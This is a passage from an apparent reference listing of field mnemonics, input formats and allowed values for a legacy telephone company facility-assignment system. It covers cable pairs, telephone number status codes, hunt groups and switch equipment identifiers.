  1409.      YY=Number Group from Frame
  1410.      ZZZ=Relay Number
  1411. ATN  Assigner's Telephone Number
  1412.      ATN XXX-XXXX
  1413.      XXX-XXXX=Assigners TN
  1414. BL   Bridge Lifter
  1415.      BL XX...XX
  1416.      XX...XX=Maximum of 17 Alphanumeric Characters
  1417. BLS  Bridge Lifter Status
  1418.      BLS X
  1419.      Y=Yes
  1420.      N=No
  1421. BND  Band Number
  1422.      BND X
  1423.      X=0-3
  1424. BTN  Billing Telephone Number
  1425.      BTN XXX-XXXX
  1426.      XXX-XXXX=Billing Telephone Number
  1427. CA   Cable Number
  1428.      CA XX...XX
  1429.      XX...XX=Maximum of 10 Alphanumeric Characters
  1430. CAT  Centrex Access Treatment
  1431.      CAT XX
  1432.      XX=Maximum of 2 Numeric Characters
  1433. CC   Call Count
  1434.      CC XX
  1435.      XX=Maximum of 2 Numeric Characters
  1436. CCF  Custom Calling Features
  1437.      CCF XXXXXX
  1438.      XXXXXX=3 to 6 Alphanumeric Characters
  1439. CCS  Hundred Call Seconds
  1440.      CCS XXXX
  1441.      XXXX=3 or 4 Numeric Characters
  1442. CEU  CCS Estimated Usage
  1443.      CEU XXXX
  1444.      XXXX=3 or 4 Numeric Characters
  1445. CG   Control Group Number
  1446.      CG X
  1447.      X=0-9
  1448. CKID Circuit Identification
  1449.      CKID XX...XX
  1450.      XX..XX=Maximum of 61 Alphanumeric Characters
  1451. CKL  Circuit Location
  1452.      CKL XXXX
  1453.      XXXX=Maximum of 4 Alphanumeric Characters
  1454. CLC  Common Language Code for an Entity
  1455.      CLC XX...XX
  1456.      XX...XX=Maximum of 11 Alphanumeric Characters
  1457. CLCI Common Language Circuit Identification
  1458.      CLCI XX...XX
  1459.      XX...XX=Maximum of 61 Alphanumeric Characters
  1460. CLEI Common Language Equipment Identifier
  1461.      CLEI XX...XX
  1462.      XX...XX=Maximum of 10 Alphanumeric Characters
  1463. CLF  Creating DIPs Upper Bound Load Factor
  1464.      CLF XX
  1465.      XX=1-10
  1466. CLL  Creating DIPs Lower Bound Load Factor
  1467.      CLF X
  1468.      X=1-9
  1469. CLS  CLCI in Serial Number Format
  1470.      CLS XX...XX
  1471.      XX..XX=Maximum of 61 Alphanumeric Characters
  1472. CLT  CLCI Telephone Number Format
  1473.      CLT XX...XX
  1474.      XX...XX=Maximum of 61 Alphanumeric Characters
  1475. CMF  Capacity Main Station Fill
  1476.      CMF XXXXXX
  1477.      XXXXXX=Maximum of 6 Numeric Characters
  1478. CMU  CCS Measured Usage
  1479.      CMU XXXX
  1480.      XXXX=3 or 4 Numeric Characters
  1481. COM  Complement Size
  1482.      COM XXXX
  1483.      XXXX=1-9999
  1484. CON  Concentrator
  1485.      CON XX-YY
  1486.      XX=Maximum of 2 Alphanumeric Characters
  1487.      YY=Maximum of 2 Numeric Characters
  1488. CP   Cable and Pair Number
  1489.      CP XX...XX-YZZZ
  1490.      XX...XX=Cable ID, Maximum of 10 Alphanumeric Characters
  1491.      YZZZ=Cable Pair ID
  1492.      Y=Alphanumeric
  1493.      ZZZ=Numeric
  1494. CPU  CCS Capacity Usage
  1495.      CPU XXXX
  1496.      XXXX=3 or 4 Numeric Characters
  1497. CRG  CREG Tag
  1498.      CRG XXX
  1499.      XXX=YES or NO
  1500. CS   Customer Class of Service
  1501.      CS XXXXXX
  1502.      XXXXXX=Maximum of 6 Alphanumeric Characters
  1503. CTID Circuit Termination Identification
  1504.      CTID XX...XX
  1505.      XX...XX=Maximum of 61 Alphanumeric Characters
  1506. CTT  Cut Through Tag
  1507.      CTT XXX
  1508.      XXX=YES or NO
  1509. CTX  Centrex Group Number
  1510.      CTX XXXX
  1511.      XXXX=Maximum of 4 numeric Characters
  1512. DC   Dial Code
  1513.      DC X
  1514.      X=1 Alpha Characters
  1515. DD   Due Date
  1516.      DD MM-DD-YY
  1517.      MM=Month
  1518.      DD=Day
  1519.      YY=Year
  1520. DID  Direct Inward Dialing
  1521.      DID XXXX
  1522.      XXXX=Maximum of 4 Numeric Characters
  1523. DIP  DIP Creation Option
  1524.      DIP X
  1525.      Y=Yes
  1526.      N=No
  1527. DNY  Denial of Service for Non-payments
  1528.      DNY X
  1529.      I=Incoming
  1530.      O=Outgoing
  1531.      B=Both
  1532. DPA  Different Premises Address
  1533.      DPA XXX
  1534.      XXX=Maximum of 3 Alphanumeric Characters
  1535. DPT  Department Name
  1536.      DPT XXX
  1537.      XXX=Maximum of 3 Alphanumeric Characters
  1538. DST  Destination of Order Response
  1539.      DST XXXX
  1540.      XXXX=Maximum of 4 Alphanumeric Characters
  1541. DT   Due Time
  1542.      DT XX
  1543.      XX=AM, PM, or 0-9
  1544. EC   ESS Entity and Control Group Number
  1545.      EC YZ
  1546.      Y=Entity Number
  1547.      Z=Control Group Identifier
  1548. ECS  Equipment Class of Service
  1549.      ECS XXXXXX
  1550.      XXXXXX=Maximum of 6 Alphanumeric Characters
  1551. ED   Enter Date
  1552.      ED MM-DD-YY
  1553.      MM=Month
  1554.      DD=Day
  1555.      YY=Year
  1556. EN   Entity
  1557.      EN X
  1558.      X=S, E, 1, 5 or 0
  1559. EN   Entity Number
  1560.      EN X
  1561.      X=0-9
  1562. ENT  Entity Number
  1563.      ENT X
  1564.      X=0-9
  1565. EO   Error Handling Option
  1566.      EO XX
  1567.      CE=Continue Processing and Establish Valid Circuits
  1568.      CW=Continue Processing and Withdraw Established Circuits
  1569.      SE=Stop Processing and Establish Valid Circuits
  1570.      SW=Stop Processing and Withdraw Established Circuits
  1571. EQF  Equipment Features
  1572.      EQF WXYZ
  1573.      W=R (Rotary) or T (Touchtone)
  1574.      Y=S (Sleeve) X (Range Extension) or N (Non-sleeve or Non-range Extension)
  1575.      X=E (Essential) or N (Non-essential)
  1576.      Z=G (Ground Start) or L (Loop Start)
  1577. EQV  Frame Equivalence
  1578.      EQV FXX
  1579.      F=The Letter "F"
  1580.      XX=Two Alphanumeric Characters
  1581. ETC  Estimated Trunk CCS Value
  1582.      ETC XXXX
  1583.      XXXX=Maximum of 4 Alphanumeric Characters
  1584. EXD  ECS Crossloading Option
  1585.      EXD XXX
  1586.      XXX=YES or NO
  1587. FAC  Type of Segment List Being Audited
  1588.      FAC XX
  1589.      TN=Telephone Number
  1590.      OE=Line Equipment
  1591. FAC  Circuit Confiruration
  1592.      FAC XXX          or
  1593.      FAC TN-NNX       or
  1594.      FAC CP-XX...X    or
  1595.      FAC SE-YY...Y    or
  1596.      FAC PL-ZZ...Z
  1597.      XXX=Any Facility Prefix
  1598.      NNX=Three Alphanumeric Characters
  1599.      XX...XX=Maximum of 10 Alphanumeric Characters
  1600.      YY...YY=Maximum of 52 Alphanumeric Characters
  1601.      ZZ...ZZ=Maximum of 61 Alphanumeric Characters
  1602. FC   From Cable
  1603.      FC XX...XX
  1604.      XX...XX=Maximum of 10 Alphanumeric Characters
  1605. FDD  Frame Due Date
  1606.      FDD MM-DD-YY
  1607.      MM=Month
  1608.      DD=Day
  1609.      YY=Year
  1610. FEA  Customer Feature
  1611.      FEA XXXX
  1612.      (Same as EQF)
  1613. FILT Filter
  1614.      FILT XXX
  1615.      XXX=Y, YES, N, or NO
  1616. FR   Frame Identification
  1617.      FR FXX
  1618.      F=The letter "F"
  1619.      XX=Two Alphanumeric Characters
  1620. FT   Frame Time
  1621.      FT XX
  1622.      XX=01-24
  1623. FW   MDF Output Suppressed
  1624.      FW X
  1625.      Y=Frame Work Yes
  1626.      N=Frame Work No
  1627. GP   MLHG Group Number
  1628.      GP Y-XXXX
  1629.      Y=Alphanumeric Control Group
  1630.      XXXX=Numeric Group Number
  1631. GSO  Ground Start Option
  1632.      GSO X
  1633.      1=Assigned to any OE in the Entity
  1634.      2=Assigned to Even Levels
  1635.      3=Only Assigned to OE Specified as Ground Start
  1636. HC   Hunt Count
  1637.      HC XXXX
  1638.      XXXX=Maximum of 4 Numeric Characters
  1639. HF   Hunt-from Telephone Number
  1640.      HF XXX-XXXX
  1641.      XXX-XXXX=Telephone Number
  1642. HLC  Highest Lead Factor Group Count
  1643.      HLC XXXX
  1644.      XXXX=1-9999
  1645. HR   Held Order Reason Code
  1646.      HR XX
  1647.      CE=Equipment Shortage
  1648.      CF=Lack of Facility
  1649.      CL=Plant Load
  1650.      CO=General Company Reasons
  1651.      C1-C5-Additional Company Reasons
  1652.      SA=Subscriber Access
  1653.      SL=Subscriber Requested Later Date
  1654.      SO=General Subscriber Reasons
  1655.      SR=Subscriber Not Ready
  1656.      S1-S5=Additional General Subscriber Reasons
  1657. HRS  Hours Prefix
  1658.      HRS XX
  1659.      XX=01-24
  1660. HT   Hunt-to Telephone Number
  1661.      HT XXX-XXXX
  1662.      XXX-XXXX=Telephone Number
  1663. HTG  Hunt-to Group Number
  1664.      HTG Y-XXXX
  1665.      Y=Alphanumeric Control Group
  1666.      XXXX=Numeric Group Number
  1667. HTX  Hunt-to X Number
  1668.      HTX XXX-YYXX of
  1669.      HTX XXX-YXX
  1670.      Y=Alphanumeric
  1671.      X=Numeric
  1672. INIT Allocation Table Initalization
  1673.      INIT
  1674.      (No Data Entry)
  1675. ITM  Cable Pair Item Number
  1676.      ITM XX
  1677.      XX=Two Numeric Characters
  1678. JL   Jumper Length
  1679.      JL XXX
  1680.      XXX=Maximum of 3 Numeric Characters
  1681. JR   Jeopardy Reason
  1682.      JR XX
  1683.      A1=Assignment Error on CP
  1684.      A2=Assignment Error on OE
  1685.      A3=Assignment Error on TN
  1686.      A4-A9=Other Assignment Error
  1687.      C1=No SSWO for Circuit Design Group
  1688.      C2-C9=Local Code for Circuit Design Group
  1689.      E1-E9=No ESS Translations
  1690.      IB=No Installation Go-ahead for Business
  1691.      IC=No Installation Go-ahead for Coin
  1692.      ID=No Installation Go-ahead for Data
  1693.      IR=No Installation Go-ahead for Residence
  1694.      IS-No Installation Go-ahead for Special
  1695.      I1-I4=Local Codes foir No Installation Go-ahead
  1696.      RB=Business RSB
  1697.      RC=Coin RSB
  1698.      RD=Data RSB
  1699.      RR=Residence RSB
  1700.      RS=Special RSB
  1701.      R1-R4=Local Use for RSB
  1702. LC   Output Line Count
  1703.      LC XXXX
  1704.      XXXX=0-9999
  1705. LC   Line Count
  1706.      LC XXX
  1707.      XXX=0-999
  1708. LC   Pending Service Order Count
  1709.      LC
  1710.      (No Data Entry)
  1711. LCC  Line Class Code
  1712.      LCC XXX
  1713.      XXX Maximum of 3 Alphanumeric Characters
  1714. LD   Loading Division
  1715.      LD XX
  1716.      XX=Two Numeric Characters
  1717. LDN  Listed Directory Number
  1718.      LDN XXX-XXXX
  1719.      XXX-XXXX=Telephone Number
  1720. LF   Load Factor
  1721.      LF XX
  1722.      XX=1-10
  1723. LIM  Less Than the Specified Number of Pairs
  1724.      LIM XX
  1725.      XX=0-50
  1726. LIM  High Limit on Number of Specified Status Pairs in a Complement
  1727.      LIM XX
  1728.      XX=0-50
  1729. LIM  Low Limit on Number of Spare Line Equipment in Vertical Files
  1730.      LIM XX
  1731.      LIM=1-10
  1732. LLC  Low Load Group Count
  1733.      LLC XXXX
  1734.      XXXX=0-9999
  1735. LOC  Location
  1736.      LOC FXXYYY
  1737.      F=The Letter "F"
  1738.      XX=Alphanumeric
  1739.      YYY=001-999
  1740. LP   Loop Range
  1741.      LP XXX;XXX
  1742.      XXX;XXX=Six Numeric Characters
  1743. LS   List New Pending Cable Transfers
  1744.      LS XXX
  1745.      XXX=NEW
  1746. LTI  Loop Termination Identifier
  1747.      LTI XXX
  1748.      XXX=Three Alphanumeric Characters
  1749. MASK Office Equipment Mask
  1750.      MASK OE ID
  1751.      ID=XXX-XXX-XXX    =1ESS
  1752.      ID=XXX-XXXX       =2ESS
  1753.      ID=XXX-XXXX       =3ESS
  1754.      ID=XXXX-XXX-XX    =5ESS
  1755.      ID=XXXX-XX-XX     =5ESS
  1756.      ID=XXXX-X-XXXX    =RSS
  1757.      ID=XXXX-XXX-XX    =1XB
  1758.      ID=XXXX-XXXX-XX   =1XB
  1759.      ID=XXX-XX-XX      =5XB
  1760.      ID=XXXX-XXX       =SXS
  1761.      ID=XXX-X-XX-X     =DMS-10
  1762.      ID=XXX-X-XX-XX    -DMS-100
  1763.      X=Alphanumeric
  1764. MAT  Manual Assistance Tag
  1765.      MAT XXX
  1766.      XXX=YES or NO
  1767. MAX  Maximum Percentage Value of Entity Fill or Maximum CCS Value
  1768.      MAX XXX
  1769.      XXX=Maximum of 3 Numeric Characters
  1770. MBL  Mini-bridge Lifter Tag
  1771.      MBL XX
  1772.      Y=MBL Working on CP
  1773.      N=CP Can't Support MBL
  1774.      EQ=CP has MBL Capabilities
  1775. MC   Marker Class of Service
  1776.      MC XX
  1777.      XX=Two Alphanumeric Characters
  1778. MF   Recent Change Message Format
  1779.      MF XXXX
  1780.      NEW=RX:LINE:messages
  1781.      OUT=RC:LINE:OUT:messages
  1782.      CHG=RC:LINE:CHG:messages
  1783.      SUSP=RC:LINE:CHG:messages of suspended service
  1784. MF   Jumper Listing for MDF
  1785.      MF XXX
  1786.      NEW=Running Jumper Listing
  1787.      DJ=Dead Jumper Listing
  1788. MF   Message Format When Completing Transfer Circuits with TOC
  1789.      MF XXX
  1790.      ALL=Message is Printed for Every Circuit in Range
  1791.      ERR=Message Printed Only for Circuits not Completed
  1792. MF   Message Format for Dial Transfer Number Lists
  1793.      MF XXX
  1794.      GVR=Transaction GFR Output Format, One Facility per Line
  1795.      LVT=Line Verification Test Format
  1796.      TLC=Two-line Condensed Format
  1797. MG   Marker Group Number
  1798.      MG X
  1799.      X=0-9
  1800. MIN  Minimum Percentage Value of Entity Fill or Minimum CCS Value
  1801.      MIN XXX
  1802.      XXX=Maximum of 3 Numeric Characters
  1803. MLP  Multi-loop Resistance Zone Threshold
  1804.      MLP XX
  1805.      XX=Two Numeric Characters
  1806. MOD  Module Number
  1807.      MOD XXX
  1808.      XXX=Three Numeric Characters
  1809. MODE Integrated SLC No. 5ESS Mode
  1810.      MODE X
  1811.      1=5 T1 Carrier Channels
  1812.      2=3 T1 Carrier Channels
  1813. MPN  Master Work Package Number
  1814.      MPN XXXX
  1815.      XXXX=1-9999
  1816. MR   Message Register
  1817.      MR XXXXXX
  1818.      XXXXXX=Maximum of 6 Alphanumeric Characters
  1819. MRO  Message Register Option
  1820.      MRO XXX
  1821.      XXX=YES or NO
  1822. MT   Master Record Tape Unit Number or Tape Drive to Write
  1823.      MT X
  1824.      X=Numeric
  1825. MTR  Tape Drive to Read
  1826.      MTR X
  1827.      X=Numeric
  1828. MTW  Tape Drive to Write
  1829.      MTW X
  1830.      X=Numeric
  1831. NAR  NAC Assignment Review
  1832.      NAR XXX
  1833.      XXX=Maximum of 3 Numeric Characters
  1834. NGF  Number Group Frame for 5XB
  1835.      NGF XXX
  1836.      XXX=Three Numeric Characters
  1837. NNX  Telephone Exchange Code
  1838.      NNX XXX
  1839.      XXX=THree Numeric Characters
  1840. NOE  Number of OEs to be Assigned
  1841.      NOE X
  1842.      X=0 or 1
  1843. NPA  Area Code and Exchange Number
  1844.      NPA XXXXXX
  1845.      XXXXXX=Six Alphanumeric Characters
  1846. NRM  Normalizing CCS VAlue
  1847.      NRM XX
  1848.      XX=0-99
  1849. NTN  Number of TNs to be Assigned
  1850.      NTN X
  1851.      X=0 or 1
  1852. OA   Line Equipment Assignment Option
  1853.      OA X
  1854.      Y=Yes
  1855.      N=No
  1856. OC   Order Category
  1857.      OC XXX
  1858.      ACT=Assignment Change Ticket
  1859.      ALL=All OE Load Factors
  1860.      CPC=Special Service
  1861.      FM=Count Since OE Input Features Occurrences
  1862.      FO=Count All OE Input Feature Occurrences
  1863.      HOT=Frame Ouput-urgent
  1864.      JR=Jeopardy Reason
  1865. OCS  Old Class of Service
  1866.      OCS XXXXXX
  1867.      XXXXXX=Maximum of 6 Alphanumeric Characters
  1868. OD   Output Device
  1869.      OD XXXX
  1870.      TT=Send Output to Current Terminal
  1871.      TTXX=Send Output to Specified Terminal XX
  1872.      MTX=Send Output to Magnetic Tape X
  1873. OE   Office Equpiment Number
  1874.      OE ID
  1875.      (See MASK)
  1876. OGO  Outgoing Only Trunk
  1877.      OGO XXX
  1878.      XXX=Maximum of 4 Numeric Characters
  1879. OPT  Party Assignment Option
  1880.      OPT X
  1881.      1=Assign Multi-party Customers to Spare Party Equipment
  1882.      2=Assign Multi-party Customer to Partially Equipped Party Equipment
  1883.      3=Assign Only One Multi-Party Customer to each Single Party Equipment
  1884. ORD  Service or Work Order
  1885.      ORD XX...XX
  1886.      XX...XX=Maximum of 20 Alphanumeric Characters
  1887. OT   Service or Work Order Type
  1888.      OT XXX
  1889.      BT=Background Transfer
  1890.      CD=Complete Disconnect
  1891.      CH=Changed
  1892.      CIO=Company Initiated Orders
  1893.      F="FROM"
  1894.      LET=Line Equipment Transfers
  1895.      LST=Line and Station Transfers
  1896.      MCE=Maintenance Change by LAC
  1897.      MCR=Maintenance Change by Repair
  1898.      MCT=All Maintenance Changes
  1899.      NC=New Connect
  1900.      R=Remarks
  1901.      REA=Pending Reassociation
  1902.      SW=Swap
  1903.      T="TO"
  1904. PBX  Private Branch Exchange
  1905.      PBX XXXX
  1906.      XXXX=Maximum of 4 Numeric Characters
  1907. PCID Primary Circuit Identification
  1908.      PCID XX...XX
  1909.      XX...XX=Maximum of 61 Alphanumeric Characters
  1910. PKT  Picket Fence Values
  1911.      PKT XXX.X,...,XXX.X
  1912.      XXX.X,...,XXX.X=Nine sets of Four Numeric Characters or
  1913.      N=No New Values
  1914. PL   Private line Circuit Number
  1915.      PL XX...XX
  1916.      XX...XX=Maximum of 61 Alphanumeric Characters
  1917. PNL  PREMIS Number List for TN
  1918.      PNL XX...XX
  1919.      XX...XX=Maximum of 12 Alphanumeric Characters
  1920. POP  Line Equipment Print Option
  1921.      POP XXX
  1922.      CNC=Concentrator-1ESS, 2ESS, 3ESS, RSS
  1923.      CNG=Concentrator Group-2ESS, 3ESS
  1924.      HG=Horizontal Group-5XBAR
  1925.      IM=Interface Module-5ESS
  1926.      LFG=Line Finder Group-SXS
  1927.      LLF=Line Link Frame-5XBAR
  1928.      LLN=Line Link Net-1ESS
  1929.      LTN=Line Trunk Net-2ESS
  1930.      LU=Link Unit Module-5ESS
  1931.      QC=Quarter Choice-1XBAR
  1932.      SW=Switch-1XBAR
  1933.      VF=Vertical FIle-5XBAR
  1934. PR   Cable Pair ID
  1935.      PR YXXX
  1936.      Y=Alphanumeric
  1937.      XXX=Numeric
  1938. PRI  Frame Priority
  1939.      PRI XX
  1940.      XX=Two Numeric Characters
  1941. PRP  Permanent Cable Pair Remarks
  1942.      PRP XX...XX
  1943.      XX...XX=Maximum of 14 Alphanumeric Characters
  1944. PRZ  Preferred Rate Zone
  1945.      PRT X
  1946.      X=Numeric
  1947. PS   Previously Published/Non-published Facility Indicator
  1948.      PS X
  1949.      N=Non-Published
  1950.      !=Published
  1951. PT   Package Time
  1952.      PT XXX
  1953.      XXX=Three Numeric Characters
  1954. PTY  Party Number or Position
  1955.      PTY X
  1956.      X=1-4
  1957. PTY  Party Indicator
  1958.      PTY X
  1959.      R=Reserved
  1960.      O=Open
  1961. PWC  PREMIS Wire Center
  1962.      PWC XX...XX
  1963.      XX...XX=Maximum of 8 Alphanumeric Characters
  1964. PWC  Print Work Code
  1965.      PWC XXX
  1966.      NBT=No Back Tap
  1967.      COM=Frame Complete
  1968.      PBT=Print Back Tap
  1969.      RCT=Place Heat Coils on "TO" Pair
  1970.      RBT=Remove Back Tap
  1971.      RCF=Remove Heat Coils on "FROM" Pair
  1972.      VBT=Verify Back Tap
  1973.      USX=Locally Defined Codes (X=1-4)
  1974. RAP  Rotary Assignment Priority
  1975.      RAP X
  1976.      X=Numeric
  1977. RCT  Recent Change Type
  1978.      RCT XX
  1979.      1=1ESS Office
  1980.      1A=1AESS Office
  1981.      2=2ESS (LO1)
  1982.      2E=2ESS (EF1 and EF2)
  1983.      3=3ESS
  1984.      5T=5ESS
  1985. RCW  Recent Change Keyword
  1986.      RCW XX...XX
  1987.      XX...XX=Maximum of 20 Alphanumeric Characters
  1988. RD   Release Date
  1989.      RD MM-DD-YY
  1990.      MM=Month
  1991.      DD=Day
  1992.      YY=Year
  1993. RDG  Message Register Reading
  1994.      RDG XXXX
  1995.      XXXX=Four Numeric Characters
  1996. REC  Record File Name and Number
  1997.      REC FFXXXXXX
  1998.      FF=File Name (Alphanumeric)
  1999.      XXXXXX=Record Number (Maximum of 6 Numeric Characters)
  2000. REP  Reprint Option
  2001.      REP X
  2002.      Y=Yes
  2003.      N=No
  2004. RESP Send a Solicited Response
  2005.      RESP X
  2006.      S=Solicited Response
  2007. REW  Rework Status
  2008.      REW X
  2009.      Y=Yes
  2010.      N=No
  2011. RLF  Re-using DIPs Upper Bound Load Factor
  2012.      RLF X
  2013.      X=1-9
  2014. RLO  Automatic Relay Assignment Present
  2015.      RLO X
  2016.      Y=Yes
  2017.      N=No
  2018. RLY  Miscellaneous Relay
  2019.      RLY XX...XX
  2020.      XX...XX=Maximum of 10 Alphanumeric Characters
  2021. RMK  Remarks on Orders
  2022.      RMK XX...XX
  2023.      XX...XX=Maximum of 28 Alphanumeric Characters
  2024. RMKG Hunt Group Remarks
  2025.      RMKG XX...XX
  2026.      XX...XX=Maximum of 30 Alphanumeric Characters
  2027. RMKO Remarks on Office Equipment
  2028.      RMKO XX...XX
  2029.      XX...XX=Maximum of 12 Alphanumeric Characters
  2030. RMKP Remarks on Cable Pair
  2031.      RMKP XX...XX
  2032.      XX...XX=Maximum of 14 Alphanumeric Characters
  2033. RMKT Remarks on Telephone Number
  2034.      RMKT XX...XX
  2035.      XX...XX=Maximum of 14 Alphanumeric Characters
  2036. RNO  RSS Subentity Number
  2037.      RNO XX
  2038.      XX=01-63
  2039. RTI  Route Index
  2040.      RTI XXXX
  2041.      XXXX=Maximum of 4 Numeric Characters
  2042. RTYP Relay Type
  2043.      RTYP XXX
  2044.      TBA=Tens Block Auxiliary
  2045.      SC=Sleeve Connect
  2046.      AR=Advance
  2047. RTZ  Rate Zone
  2048.      RTZ X
  2049.      X=Numeric
  2050. RW   Recent Change Work
  2051.      RW X
  2052.      N=Recent Change Message not Required
  2053.      C=Recent Change Coordination Required
  2054. RZ   Resistance Zone
  2055.      RZ XX
  2056.      XX=Two Numeric Characters
  2057. SBS  Sub-status
  2058.      SBS X
  2059.      A=Area Transfer
  2060.      C=Cut Through
  2061.      D=Dedicated
  2062.      L=Cut Through and Dedicated
  2063.      !=Blank
  2064. SC   Sleeve Connect Relay
  2065.      SC SYY-ZZZ
  2066.      S=Marker Group (Numeric)
  2067.      YY=Number Group Frame (Numeric)
  2068.      ZZZ=Relay Number (Numeric)
  2069. SE   Special Service Equipment Number
  2070.      SE XX...XX
  2071.      XX...XX=Maximum of 52 Alphanumeric Characters
  2072. SET  Single Entity Tag
  2073.      SET X
  2074.      Y=CP is Served by a Single Entity on a Single Frame
  2075.      !=CP Can be Served by More Than One Entity
  2076. SG   Service Segment
  2077.      SG X
  2078.      B=Business
  2079.      C=Coin
  2080.      D=Data
  2081.      R=Residence
  2082.      S=Special
  2083. SGN  Common Language Segment Number
  2084.      SGN XXX
  2085.      XXX=Maximum of 3 Alphanumeric Characters
  2086. SIS  Special Identifying Telephone Number Supplement
  2087.      SIS XXXX
  2088.      XXXX=Maximum of 4 Numeric Characters
  2089. SIT  Special Identifying Telephone Number
  2090.      SIT XXX-YYY-XXXX
  2091.      X=Numeric
  2092.      Y=Numeric
  2093. SK   Skip Option
  2094.      SK X
  2095.      X=0 or 2-9
  2096. SN   Sequence Number
  2097.      SN XXX
  2098.      XXX=1-999
  2099. SOB  Service Observing Tag
  2100.      SOB XXX
  2101.      XXX=YES or NO
  2102. SS   Suspension Status
  2103.      SS XX
  2104.      DB=Deny Both Ways
  2105.      DI=Deny Incoming
  2106.      DO=Deny Outgoing
  2107.      RS=Restore Suspended Circuit
  2108.      SB=Suspend Both Ways
  2109.      SD=Season Disconnect
  2110.      SI=Suspend Incoming
  2111.      SO=Suspend Outgoing
  2112.      DX=Deny Toll Access Tervice
  2113. SSV  Suspend Service Type
  2114.      SSV XX
  2115.      DO=Deny Outward Service
  2116.      DB=Deny Both Outward and Inward Service
  2117.      DX=Deny Toll Access Service
  2118.      RS=Restore Denied Service
  2119. STAT Order Status
  2120.      STAT XX
  2121.      AC=Pending With no Framd or Installation Completion
  2122.      FC=Pending With Frame Completion but no Installation Completion
  2123.      IC=Pending with Installation Complation but no Frame Completion
  2124.      CC=Completed Orders
  2125.      CA=Canceled Orders
  2126. STAT Facility Status
  2127.      STAT XX
  2128.      AS=All Spare
  2129.      EX=Excluded
  2130.      PC=Pending Connect
  2131.      RS=Reserved
  2132.      SF=Spare Facility
  2133.      UK=Unknown
  2134.      WK=Working
  2135. STAT Load Group Status
  2136.      STAT XX
  2137.      EX=Blocked from all Assignments
  2138.      FU=Open for Dial Transfer Assignments Only
  2139.      PS=Pseudo LEN Assignments Only
  2140.      SO=Open for Service Orders and Work Orders Only
  2141.      WK=Open for All Assignments
  2142. STO  Line Equipment Status
  2143.      STO XX
  2144.      AW=All Working
  2145.      MS=Miscellaneous
  2146.      OF=Official
  2147.      TJ=Trunk and Junctor
  2148.      TS=Test
  2149.      WK=Working
  2150.      PD=Pending Disconnect
  2151.      PK Pending Disconnect/Pending New Connect
  2152.      AS=All Spare
  2153.      EX=Excluded
  2154.      LI=Left-in Disconnect
  2155.      RS=Reserved
  2156.      SF=Spare
  2157.      UK=Unknown
  2158.      PC=Pending Connect
  2159. STP  Cable and Pair Status
  2160.      STP XX
  2161.      AL=All Pairs
  2162.      AD=All Defective
  2163.      AP=All Provisioned
  2164.      AW=All Working
  2165.      DC=Designed Circuit
  2166.      DI=Defective (I=1-9)
  2167.      DM=Designed + SSM
  2168.      DP=Designed + SSP
  2169.      SM=Special Safeguard Measures
  2170.      SP=Special Safeguard Protection
  2171.      SS=Special Status
  2172.      WK=Working
  2173.      AS=All Spare
  2174.      EX=Excluded
  2175.      LI=Left-in Disconnect
  2176.      RS=Reserved
  2177.      SF=Spare
  2178.      UK=Unknown
  2179.      PC=Pending Connect
  2180.      PD=Pending Disconnect
  2181. STT  Telephone Number Status
  2182.      STT XX
  2183.      AU=Auxiliary
  2184.      AW=All Working
  2185.      MS=Miscellaneous
  2186.      NP=Non-published
  2187.      OF=Official
  2188.      TJ=Trunk and Junctor
  2189.      TS=Test
  2190.      WK=Working
  2191.      AS=All Spare
  2192.      AV=Available
  2193.      CM=Changed-Machine Intercept
  2194.      CO=Changed-Operator Intercept
  2195.      DM=Disconnected-Machine Intercept
  2196.      DO=Disconnected-Operator Intercept
  2197.      EX=Excluded
  2198.      RS=Reserved
  2199.      SF=Spare
  2200.      UK=Unknown
  2201.      PC=Pending Connect
  2202.      PD=Pending Disconnect
  2203.      PK=Pending Disconnect/Pending New Connect
  2204. SUBL Sublet Service
  2205.      SUBL XXX-XXXX
  2206.      XXX-XXXX=Telephone Number
  2207. SWC  Set Work Code
  2208.      SWC XXX
  2209.      (See Print Work Code)
  2210. SWG  Switch Group
  2211.      SWG X
  2212.      X=0-2
  2213. SYS  Machine Number
  2214.      SYS XX...XX
  2215.      XX...XX=Maximum of 12 Alphanumeric Characters
  2216. TA   Transfer Assembly
  2217.      TA X
  2218.      Y=Yes
  2219.      N=No
  2220. TAP  Touchtone Assignment Priority Number
  2221.      TAP X
  2222.      X=Numeric
  2223. TBA  TBA Relay
  2224.      TBA XYY-ZZZ
  2225.      X=Marker Group Number (Numeric)
  2226.      YY=Number Group Frame (Numeric)
  2227.      ZZZ=Relay Number (Numeric)
  2228. TBS  TBS Relay
  2229.      TBS XZ-NN
  2230.      X=Marker Group Number (0-9)
  2231.      Z=Relay Number (0-3)
  2232.      NN=Ringing Combination (01-16)
  2233. TC   TO Cable
  2234.      TX XX...XX
  2235.      XX...XX=Maximum of 10 Alphanumeric Characters
  2236. TER  Terminal
  2237.      TER XXXX
  2238.      XXXX=Maximum of 4 Numeric Characters
  2239. TER  Terminal Number
  2240.      TER Y-XXXX-ZZZZ
  2241.      Y=Control Group (Alphanumeric)
  2242.      XXXX=Group Number (Numeric)
  2243.      ZZZZ=Terminal Number (Numeric)
  2244. THG  Thousands Group
  2245.      THG X or
  2246.      THG XXXX
  2247.      X=0-9
  2248.      XXXX=0000,1000,...,9000
  2249. TK   Trunk Cable and Pair Number
  2250.      TK YYYYYY-XXXX
  2251.      YYYYYY=Cable ID (Maximum of 6 Alphanumeric Characters)
  2252.      XXXX=Cable Pair ID (Maximum of 4 Numeric Characters)
  2253. TLI  Telephone Line Identifier
  2254.      TLI XXX-YYY-XXXX
  2255.      X=Numeric
  2256.      Y=Alphanumeric
  2257. TN   Telephone Number
  2258.      TN XXX-XXXX
  2259.      XXX-XXXX=Telephone Number
  2260. TOM  Two or More Non-pending, Non-party Filtered Circuit Facilities
  2261.      TOM XX
  2262.      CP=Cable Pair
  2263.      TN=Telephone Number
  2264.      OE=Office Equipment
  2265. TP   Tie Pair
  2266.      TP YY...YY-XXXX
  2267.      YY...YY=Cable ID (Maximum of 10 Alphanumeric Characters)
  2268.      XXXX=Tie Pair ID (Maximum of 4 Numeric Characters)
  2269. TPR  Taper Code
  2270.      TPR XXXXXX
  2271.      XXXXXX=Maximum of 6 Alphanumeric Characters
  2272. TRE  Transmission Equipment
  2273.      TRE XX...XX
  2274.      XX...XX=Maximum of 17 Alphanumeric Characters
  2275. TT   Telephone Number Type
  2276.      TT X
  2277.      B=POTs Hunting
  2278.      C=Coin
  2279.      G=Complex Service (Direct Inward Dialing, Radio Common Carrier, etc)
  2280.      O=Official
  2281.      Q=Centrex
  2282.      X=POTx Non-hunting
  2283. TTA  Terminating Traffic Area
  2284.      TTA XXX
